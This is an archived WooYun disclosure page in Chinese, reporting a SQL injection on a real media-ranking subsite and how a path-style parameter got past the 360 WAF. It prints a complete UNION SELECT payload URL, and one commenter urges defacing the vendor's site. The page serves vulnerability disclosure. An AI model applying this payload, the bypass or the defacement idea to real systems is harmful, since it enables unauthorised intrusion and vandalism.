当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-027520

漏洞标题:速途网络科技有限公司分站存在注入(绕过360网站卫士)

相关厂商:速途网络科技有限公司

漏洞作者: 煦阳。

提交时间:2013-07-02 23:22

修复时间:2013-08-16 23:23

公开时间:2013-08-16 23:23

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:5

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2013-07-02: 细节已通知厂商并且等待厂商处理中
2013-07-03: 厂商已经确认,细节仅向厂商公开
2013-07-13: 细节向核心白帽子及相关领域专家公开
2013-07-23: 细节向普通白帽子公开
2013-08-02: 细节向实习白帽子公开
2013-08-16: 细节向公众公开

简要描述:

常规注入。。

详细说明:

360网站卫士很X蛋
http://mediarank.sootoo.com/index.php/index/web_info/id/3
这样注入是不拦的
变一下
http://mediarank.sootoo.com/index.php/index/web_info?id=3
这样就拦了!
WTFk?

漏洞证明:

http://mediarank.sootoo.com/index.php/index/web_info/id/3 and 1=2 UNION SELECT 1,2,user(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,database(),20,21,22,23,24,25,26,27,28,29,30,31,32


sootoo.jpg

修复方案:

修复的话. 就找专业人士吧-3-

版权声明:转载请注明来源 煦阳。@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2013-07-03 09:49

厂商回复:

漏洞确实存在。已经修复。
感谢乌云和煦阳。包括上次的漏洞,我们都向公司申请过礼物,但公司主要领导不重视技术,没有批准,很抱歉。

最新状态:

暂无

漏洞评价:

评论

  1. 2013-07-02 23:23 | 疯子 ( 普通白帽子 | Rank:242 漏洞数:42 | 世人笑我太疯癫,我笑世人看不穿~)

    洞主V5,360渣渣!

  2. 2013-07-02 23:23 | 腰上有胸器 ( 路人 | Rank:11 漏洞数:5 | 一根带刺的黄瓜和一个女人的故事。)

    洞主V5,360渣渣!

  3. 2013-07-02 23:40 | 乐乐、 ( 普通白帽子 | Rank:853 漏洞数:189 )

    洞主V5,360渣渣!

  4. 2013-07-02 23:48 | 基佬库克 ( 实习白帽子 | Rank:75 漏洞数:15 | 简介什么的是直接爆菊吧..)

    @乐乐、 @腰上有胸器 @疯子 周教主很萌的,乃们不要黑他

  5. 2013-07-02 23:55 | 煦阳。 ( 普通白帽子 | Rank:134 漏洞数:27 | 这个人很懒,什么都没留下。)

    这括号....谁加的!!!!

  6. 2013-07-02 23:58 | 基佬库克 ( 实习白帽子 | Rank:75 漏洞数:15 | 简介什么的是直接爆菊吧..)

    @煦阳。 我可以理解为卖萌吗??

  7. 2013-07-03 00:02 | 煦阳。 ( 普通白帽子 | Rank:134 漏洞数:27 | 这个人很懒,什么都没留下。)

    @基佬库克 审核人员加的..

  8. 2013-07-03 00:08 | px1624 ( 普通白帽子 | Rank:1036 漏洞数:175 | px1624)

    。。。感觉后面括弧里面的东西可以不要吧

  9. 2013-07-03 00:10 | 煦阳。 ( 普通白帽子 | Rank:134 漏洞数:27 | 这个人很懒,什么都没留下。)

    @px1624 +1

  10. 2013-07-03 00:12 | xsser 认证白帽子 ( 普通白帽子 | Rank:254 漏洞数:18 | 当我又回首一切,这个世界会好吗?)

    @px1624 @煦阳。 内容里需要关注的点会体现出来的

  11. 2013-07-03 01:31 | 海绵宝宝 ( 普通白帽子 | Rank:243 漏洞数:50 | 唯有梦想与好姑娘不可辜负.)

    洞主V5,360渣渣!

  12. 2013-07-03 09:56 | zzR 认证白帽子 ( 核心白帽子 | Rank:1382 漏洞数:122 | 收wb 1:5 无限量收 [平台担保])

    但公司主要领导不重视技术,没有批准,很抱歉。- -#可怜

  13. 2013-07-03 10:30 | xsser 认证白帽子 ( 普通白帽子 | Rank:254 漏洞数:18 | 当我又回首一切,这个世界会好吗?)

    但公司主要领导不重视技术,没有批准,很抱歉。 - -#可怜

  14. 2013-07-03 10:50 | 煦阳。 ( 普通白帽子 | Rank:134 漏洞数:27 | 这个人很懒,什么都没留下。)

    @xsser @zzR @速途网络科技有限公司 就不告诉你们.我是冲着QB来的- -!

  15. 2013-07-03 10:53 | 乐乐、 ( 普通白帽子 | Rank:853 漏洞数:189 )

    @煦阳。 @煦阳。 @煦阳。下次该怎么对他们老板做,你懂得!

  16. 2013-07-03 10:54 | 煦阳。 ( 普通白帽子 | Rank:134 漏洞数:27 | 这个人很懒,什么都没留下。)

    @乐乐、 我是好人..

  17. 2013-07-03 10:55 | 乐乐、 ( 普通白帽子 | Rank:853 漏洞数:189 )

    @煦阳。 你是好人!\(≧▽≦)/

  18. 2013-07-08 14:19 | F4K3R ( 普通白帽子 | Rank:297 漏洞数:31 | 学习)

    啊擦~宿命为了Q币疯了!

  19. 2013-07-08 14:23 | 煦阳。 ( 普通白帽子 | Rank:134 漏洞数:27 | 这个人很懒,什么都没留下。)

    @F4K3R 唉.本想挖点洞换树莓派的.. 手贱换了QB - -

  20. 2013-07-08 22:19 | F4K3R ( 普通白帽子 | Rank:297 漏洞数:31 | 学习)

    @煦阳。 我已经有树莓派了~哇咔咔!玩腻了!

  21. 2013-07-08 22:39 | 煦阳。 ( 普通白帽子 | Rank:134 漏洞数:27 | 这个人很懒,什么都没留下。)

    @F4K3R MLGB 中午刚在taobao买了个...

  22. 2013-07-09 11:18 | F4K3R ( 普通白帽子 | Rank:297 漏洞数:31 | 学习)

    @煦阳。 去死!

  23. 2013-08-16 23:33 | 78基佬 ( 实习白帽子 | Rank:84 漏洞数:20 | 不会日站的设计师不是好产品经理)

    360本来就很好绕

  24. 2013-08-17 09:51 | saviour ( 普通白帽子 | Rank:188 漏洞数:29 | Saviour.Com.Cn 网站正在备案中)

    悲剧啊,你应该把他们的网站黑掉,然后挂个黑页,骂一下那个sb老板!

  25. 2013-08-17 15:59 | 煦阳。 ( 普通白帽子 | Rank:134 漏洞数:27 | 这个人很懒,什么都没留下。)

    @saviour 为何

  26. 2013-08-19 09:08 | saviour ( 普通白帽子 | Rank:188 漏洞数:29 | Saviour.Com.Cn 网站正在备案中)

    @煦阳。 这样你就有礼物了呀,他们公司老板不重视这块!